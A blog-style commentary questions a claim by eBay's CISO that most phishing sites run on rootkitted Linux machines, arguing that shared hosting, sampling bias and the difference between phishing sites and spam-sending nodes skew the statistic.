Linux phishing botnet statistics can be deceptive

The Register reports today that eBay's new chief information security officer (CISO) has noted a surprising trend ("eBay: Botnets are Linux-happy"). Specifically, in his previous employment as the CISO of Washington Mutual, evidence suggested that the majority of phishing attempts targeting the company originated on Linux systems.

The obvious implication is that there are far more compromised Linux systems in phishing botnets than Windows systems. This is reinforced by eBay CISO Dave Cullinane's comment that "The vast majority of [the phishing sites] we saw were on rootkit-ed Linux boxes, which was rather startling. We expected a predominance of Microsoft boxes and that wasn't the case."

There are some problems with such assumptions based on that statement, however:

  1. Each phishing site does not necessarily imply an individual machine. In fact, the use of the term "phishing site" implies Web servers -- which, in turn, implies that the majority of phishing sites are on shared hosting systems, where there may be hundreds of individual Web sites per box. Among other things, this means that a single compromised box may account for hundreds of individual phishing sites -- and Linux-based systems are the most commonly employed platforms for shared hosting.
  2. A phishing site does not imply the box was rootkitted. Not only may a phishing site merely mean that a vulnerability in a given piece of software (such as one of the hundreds of notoriously unsecured PHP content management systems) running on that server has been exploited, but if Cullinane is actually talking about phishing "sites" per se, he's excluding desktop systems employed as nodes in a botnet in favor of server systems.
  3. Phishing botnets that targeted Washington Mutual are by no means the sum total of phishing sites. Even the single most targeted bank in the world is just a small drop in a very large bucket of phishing worldwide. In terms of pure numbers, Washington Mutual's experiences may be statistically significant -- but they're also potentially biased by the fact that just one or two large botnets could have produced a majority of that traffic, and a single botnet will tend to target a specific platform or piece of (perhaps platform-specific) software rather than attacking everything pretty much indiscriminately.
  4. Phishing sites are not the same as botnet nodes. No, really -- this is the biggest problem with the obvious assumptions here. Typically, phishing botnets send out e- mails to entice users to a given Web site made to look like some other, legitimate Web site. The intent is to trick users into entering important data into the site so that whoever's running the site can then engage in some identity theft. While it makes sense that the Web sites would be run on shared hosting servers, most of the e-mails are probably being sent out by compromised home systems that are part of a phishing botnet -- which are undoubtedly primarily Windows sytems.

I'd be interested in some evidence suggesting, with a bit more validity, that the majority of phishing botnet nodes are Linux boxes, but I'm afraid this doesn't qualify, based on the scant information provided by the sensationalistic presentation in today's Register article.

If it's true that Linux boxes make up the majority of phishing botnet nodes, on the other hand, there's a simple lesson to be drawn from this: If you run a shared hosting provider, check your systems.

Cullinane made the point that people running systems used as phishing botnet nodes don't know their systems have been compromised. That's very nearly a tautology, of course, because the moment a sysadmin knows his or her system has been compromised, he or she typically cleans up the infection. Thus, no compromised systems whose sysadmins know they're compromised.

In the case of home users of Windows, it's to be expected that most compromised systems' owners don't know they've been compromised. In the case of shared hosting providers, however, one would hope the sysadmins are paying a little more attention to their networks than that. Such a widespread epidemic of shared hosting systems being turned into phishing botnet nodes can only mean that incredible numbers of shared hosting provider sysadmins aren't doing their jobs.

Pardon my cynicism but, frankly, I can't say I'm surprised.